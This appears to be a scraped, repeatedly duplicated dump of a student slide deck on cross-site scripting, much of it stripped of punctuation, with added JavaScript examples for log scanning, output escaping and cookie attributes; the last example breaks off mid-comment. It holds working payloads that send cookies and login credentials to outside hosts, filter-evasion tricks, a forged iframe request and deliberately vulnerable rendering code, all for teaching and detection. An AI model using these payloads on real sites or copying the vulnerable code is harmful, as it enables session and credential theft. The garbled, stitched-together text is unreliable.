http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>

Client can reveal posted form items to 3rd party (userID/passwd, etc.)

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to trusted server

www.trustedserver.com/xss.asp?name = <iframe src=http://www.trustedserver.com/auth_area/orderupdate?items=4000></iframe>
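Seen from the defender's side, the encoding tricks on the syntax slide (URL encoding, numeric entities, whitespace inside keywords) and the leakage examples just above are what a log review has to recognise. The following is an added example, not part of the presentation: it parses web server access-log lines, normalises the query string before matching (URL-decoding twice, decoding numeric HTML entities, stripping whitespace and control characters) and flags the lines that carry the indicators the slides describe. The log lines, the indicator list and all helper names are constructed for this example; it runs under Node.js.

```javascript
// Added example (not from the presentation): flagging reflected-XSS attempts
// in access logs. Log lines, indicator list and helper names are constructed.

// Constructed sample log in Common Log Format. Lines 1-3 mirror the
// page's examples (cookie exfiltration, whitespace inside "javascript:",
// an entity-encoded "document.cookie"); line 4 is a benign search.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /a.php?variable=%22%3E%3Cscript%3Edocument.location=%27http://evil.example/c.cgi?%27+document.cookie%3C/script%3E HTTP/1.1" 200 512',
  '203.0.113.6 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=javasc%09ript:alert(1) HTTP/1.1" 200 2048',
  '203.0.113.7 - - [10/Oct/2023:13:56:20 +0000] "GET /search?q=do%26%23x63%3Bument.cookie HTTP/1.1" 200 2048',
  '198.51.100.9 - - [10/Oct/2023:13:57:00 +0000] "GET /search?q=cross+site+scripting HTTP/1.1" 200 2048',
];

// Decode &#xHH; and &#DD; entities, which browsers accept inside attribute values.
function decodeNumericEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
}

// Bring the many encodings of one payload to a single comparable form.
function normalize(raw) {
  let s = raw;
  for (let i = 0; i < 2; i++) { // twice: catches double URL encoding
    try { s = decodeURIComponent(s.replace(/\+/g, ' ')); } catch (_) { break; }
  }
  s = decodeNumericEntities(s);
  s = s.replace(/[\s\x00-\x1f]/g, ''); // "javasc<TAB>ript" -> "javascript"
  return s.toLowerCase();
}

// Indicators taken from the constructs the slides discuss.
const INDICATORS = [
  /<script/, /javascript:/, /vbscript:/, /document\.cookie/,
  /document\.location/, /<iframe/, /\bon\w+=/,
];

function parseRequestPath(line) {
  const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
  return m ? m[1] : null;
}

function classifyLine(line) {
  const path = parseRequestPath(line);
  if (!path) return { suspicious: false, path: null, matches: [] };
  const q = path.indexOf('?');
  const query = q >= 0 ? path.slice(q + 1) : '';
  const norm = normalize(query);
  const matches = INDICATORS.filter((re) => re.test(norm)).map((re) => re.source);
  return { suspicious: matches.length > 0, path, matches };
}

function scanLog(lines) {
  return lines.map(classifyLine).filter((r) => r.suspicious);
}

for (const hit of scanLog(SAMPLE_LOG)) console.log(hit.path, '->', hit.matches);
```

Pattern matching of this kind is a triage aid for detection, not a control: it is noisy on legitimate input and an attacker has many more encodings than the three handled here. The server-side fix remains output encoding, as the Filtering slide says; the log scan tells you where that fix is being probed.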

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt

2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt

3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt

37

Related vulnerabilities

Several classes of vulnerabilities or attack techniques are related to XSS: cross-zone scripting exploits zone concepts in certain browsers and usually executes code with greater privilege [31]. HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting) [32].

Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users [33].

Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.

Page 4: Internet hacking presentation

4

Cross Site Scripting

XSS

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 5: Internet hacking presentation

5

It is a type of computer security vulnerability found in web applications which is done by injection or introduction of untrusted content into a dynamic web page about which neither the Web sites nor the client has enough information to

recognize ithellip amp this injected code is called XSS Holehellip

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistenthellip

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read

13

Examples of attackshelliphelliphellip

14

Scripting Via Malicious Linkhellip

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser

16

Stealing Userrsquos COOKIEhellip

17

If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server

20

By Scripting

21

Script can read all HTML contenttags in other window

Script can setdelete tagscontent in other window We can read and set form values then run a submit()

Script can set vars and call functions in other window

Documentwrite can allow script to create new tagscontent in other window

This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain

If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors

22

Some FACTS about the XSS attackshelliphelliphellip

23

By SURVEYhelliphelliphellip

1st Gen XSS was against public sites and ran against everyone that visited site

2nd Gen XSS focused on sites that allow self-reflection XSS

24

bull Cross-site scripting attacks are a special case of code injection

bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007

bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data

Dynamic XSS with 2way commsVictim Browser

XSS against site

IFRAME

Script commands run here

Other documents on site loaded into here

ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt

XSS Vulnerable Server

Attacker System

New jscripthellip

ltscript src=ldquoattackercomrdquogt

26

Some prominent sites that have been affected in the past arehelliphellip

The search engine Google The email services of Google and

Yahoo The social networking sites Facebook

MySpace and Orkut The developers of MediaWiki have

fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users

Researchers have claimed that as many as 68 of websites are likely open to XSS attacks

27

By seeing all this the question that arises ishelliphellip

Then how can we prevent it

28

Yes some methods are there for

prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie

31

Disabling Scriptshellip

Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis

Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip

Prblms wid thishellip Substantial reduction in functionality and

responsiveness Many sites do not work without client-side

scripting forcing users to disable protection for that site and opening their systems to the threat

32

The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content

33

For explaining Purpose

Remember the syntaxhellip

34

SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt

35

Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)

httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt

Client can reveal posted form items to 3rd party (userIDpasswd etc)

ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt

Client can be tricked into accessingposting spoofed info to trusted server

wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt

36

YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES

1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt

2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt

3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt

37

Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]

Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]

Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application

  • Slide 1
  • Dynamic content
  • Slide 3
  • Cross Site Scripting
  • Slide 5
  • Causes
  • Threats helliphelliphelliphelliphellip
  • How it is performed
  • Slide 9
  • Slide 10
  • Slide 11
  • Persistenthellip
  • Slide 13
  • Scripting Via Malicious Linkhellip
  • In this scenario the attacker sends a specially crafted e-mai
  • Slide 16
  • If any part of the Web site uses cookies then it may be possib
  • Sending an Unauthorized Request
  • In this scenario the user unknowingly executes scripts written
  • By Scripting
  • Slide 21
  • Some FACTS about the XSS attackshelliphelliphellip
  • By SURVEYhelliphelliphellip
  • Slide 24
  • Dynamic XSS with 2way comms
  • Slide 26
  • Slide 27
  • Slide 28
  • Filtering
  • Cookie Security
  • Disabling Scriptshellip
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
Page 6: Internet hacking presentation

6

Causes

The DYNAMIC contenthelliphellip Its overview is attractive for the users but

like worms it is eating the user at the backhellip

Lack of CODE practicinghelliphellip This cause is based on the fact that the

developer who inserts the script has not a lot of experience and is in deficient to provide proper security

7

Threats helliphelliphelliphelliphellip

Taking over the user session before the users session cookie expires

Connect users to a malicious server of the attackers choice

Convince a user to access a URL supplied by the attacker could cause script or HTML of the attackers choice to be executed in the users browser Using this technique an attacker can take actions with the privileges of the user who accessed the URL such as issuing queries on the underlying SQL databases and viewing the results

(GMAIL example)

8

How it is performed

Cross-site scripting holes allow attackers to bypass client-side security mechanisms imposed on web content by modern browsers By finding ways of injecting malicious scripts into web pages an attacker can gain elevated access privileges to sensitive page content session cookies(information maintained by the browser on behalf of the user)

9

bullXSS is an application level attack whichinvolves 3 parties

bullWe can load external script with a ltscript src=xxxgt tag

bullScript content can be loaded from anywhere (RPCRemote scripting is common)

bullMost attacks are only focused on collecting cookies

bullAttacker does not know actual responses to client

bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site

10

Types of XSS Attacks

11

Non-Persistent

bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection

12

Persistent (stored)…

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example is an online message board where users are allowed to post HTML-formatted messages for other users to read.

13

Examples of attacks…

14

Scripting via a malicious link…

15

In this scenario the attacker sends a specially crafted e-mail message to a victim containing a malicious link, such as:

<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>

When the user clicks the link, the URL, including the malicious code, is sent to legitimateSite.com. If the legitimate server sends back a page that includes the value of clientprofile, the malicious code executes in the client's web browser.

16

Stealing the user's cookie…

17

If any part of the web site uses cookies, it may be possible to steal them from its users. In this scenario the attacker posts a page containing malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's web site carrying the cookies gathered. Using this technique, together with the script's access to the page, the attacker can gain sensitive data such as session tokens and, by reading form fields, passwords, credit card numbers and anything else the user enters.

18

Sending an Unauthorized Request

19

In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts execute in a context that appears to have originated from the legitimate server, the attacker has full access to the retrieved document and may send data contained in the page back to their site. If the embedded script can interact further with the legitimate server without alerting the victim, the attacker can develop that access into posting data to a different page on the legitimate web server.

20

By Scripting

21

Script can read all HTML content/tags in another window of the same origin.

Script can set/delete tags and content in the other window; it can read and set form values, then call submit().

Script can set variables and call functions in the other window.

document.write allows script to create new tags/content in the other window.

This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. It has full control of the other window as long as that window is in the same document.domain.

If the script can forward cookies, it can also forward any other JavaScript-accessible content to an attacker: page contents, form values (including hidden fields…), JavaScript variables/state and JavaScript errors.

22

Some facts about XSS attacks…

23

By survey…

First-generation XSS was against public sites and ran against everyone who visited the site.

Second-generation XSS focused on sites that reflect user input back to the same user (reflected XSS), delivered to the victim through a crafted link.

24

• Cross-site scripting attacks are a special case of code injection.

• Cross-site scripting carried out on websites accounted for roughly 80% of all security vulnerabilities documented by Symantec as of 2007.

• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.

Dynamic XSS with two-way communication (diagram)

Victim browser: the XSS payload runs against the vulnerable site; its script commands execute in the page, and other documents from the same site are loaded into an IFRAME. Their contents are sent to the attacker with a request such as <script src="attacker.com/<innerHTML of IFRAME>">. The attacker's system answers with new JavaScript (<script src="attacker.com/...">), which the victim's browser runs in turn, giving the attacker an interactive loop between the XSS-vulnerable server, the victim's browser and the attacker's system.

26

Some prominent sites that have been affected in the past are…

The search engine Google; the e-mail services of Google and Yahoo; the social networking sites Facebook, MySpace and Orkut. The developers of MediaWiki have fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users.

Researchers have claimed that as many as 68% of websites are likely open to XSS attacks.

27

Seeing all this, the question that arises is…

How can we prevent it?

28

Yes, there are some methods for prevention, and those are:
>> Filtering
>> Cookie Security
>> Disabling Scripts
>> Encryption

29

Filtering

One way to eliminate some XSS vulnerabilities is to validate input and reject undesirable characters in input fields; the more reliable way is to escape all untrusted data using a method appropriate for the output context. Several different escaping schemes must be used depending on where the untrusted string is placed, including HTML numeric entity encoding, JavaScript escaping, CSS escaping and URL encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.
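The two flaw types from slides 11 and 12 and the context-aware escaping from this slide, as an added example that is not code from the presentation. It is a Node.js script with no dependencies; the parameter names, the in-memory message board and the host attacker.example are assumptions made for the example. The payloads are constructed in the spirit of the slide examples.

```javascript
// Added example, not code from the presentation: the reflected and stored
// flaws of slides 11-12 next to the context-aware output encoding of
// slide 29. Node.js, no dependencies. Parameter names, the in-memory
// message board and attacker.example are assumptions for the example.

// Escape for HTML text content and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected, vulnerable: the query string value is pasted into markup as-is.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>` +
         `<input name="q" value="${query}">`;
}

// Reflected, hardened: each use of the value is encoded for its context
// (HTML text, quoted attribute, and a URL query inside an attribute).
function renderSearchSafe(query) {
  const q = escapeHtml(query);
  const inUrl = escapeHtml(encodeURIComponent(query));
  return `<p>Results for: ${q}</p>` +
         `<input name="q" value="${q}">` +
         `<a href="/search?q=${inUrl}">search again</a>`;
}

// Stored (persistent): posts are kept and replayed to every later visitor.
const posts = [];
function postMessage(author, body) {
  posts.push({ author, body });
}
function renderBoardVulnerable() {
  return posts.map((p) => `<li><b>${p.author}</b>: ${p.body}</li>`).join('\n');
}
function renderBoardSafe() {
  return posts
    .map((p) => `<li><b>${escapeHtml(p.author)}</b>: ${escapeHtml(p.body)}</li>`)
    .join('\n');
}

// Crude indicator used by the demo: did an attacker-controlled script or
// img element reach the page as real markup (rather than as &lt;...)?
function containsInjectedElement(html) {
  return /<(script|img)\b/i.test(html);
}

// Constructed payloads in the spirit of slides 15 and 35.
const REFLECTED_PAYLOAD =
  '"><script>document.location="http://attacker.example/?c="+document.cookie</script>';
const STORED_PAYLOAD =
  '<img src=x onerror="new Image().src=\'http://attacker.example/?c=\'+document.cookie">';

// Returns which renderings let the payloads through.
function demo() {
  postMessage('mallory', STORED_PAYLOAD);
  return {
    reflectedVulnerable: containsInjectedElement(renderSearchVulnerable(REFLECTED_PAYLOAD)),
    reflectedSafe: containsInjectedElement(renderSearchSafe(REFLECTED_PAYLOAD)),
    storedVulnerable: containsInjectedElement(renderBoardVulnerable()),
    storedSafe: containsInjectedElement(renderBoardSafe()),
  };
}

console.log(demo());
// { reflectedVulnerable: true, reflectedSafe: false,
//   storedVulnerable: true, storedSafe: false }
```

The point of renderSearchSafe is that one escaping function is not enough on its own: the value that goes into the href is first URL-encoded and only then HTML-escaped, because it passes through two contexts. A value placed inside a script block or a style attribute would need JavaScript or CSS escaping instead; escapeHtml alone would not make those contexts safe.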

30

Cookie Security

Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal them. To mitigate this particular threat, many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use the cookie. This binding is a weak control: users behind a NAT or proxy share an address, mobile users change addresses, and an injected script can still act from the victim's own browser. Marking the session cookie HttpOnly keeps it out of document.cookie altogether, although script running in the page can still make requests in the user's session.
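An added example, not code from the presentation, of the cookie attributes that limit what a stolen or script-readable session cookie is worth: a builder for the Set-Cookie header, an audit of existing headers for the missing attributes, and a model of what document.cookie would expose. It is a Node.js script with no dependencies; the cookie names and values are assumptions made for the example.

```javascript
// Added example, not code from the presentation: a Set-Cookie header for a
// session token with the attributes that limit what a stolen or
// script-readable cookie is worth, an audit of existing headers for the
// missing ones, and what document.cookie would show. Node.js, no
// dependencies. Cookie names and values are assumptions for the example.

function sessionCookieHeader(name, value, { maxAgeSeconds = 1800 } = {}) {
  // HttpOnly: not readable through document.cookie, so the leak on slide 35
  // returns nothing. Secure: only sent over HTTPS. SameSite=Lax: omitted
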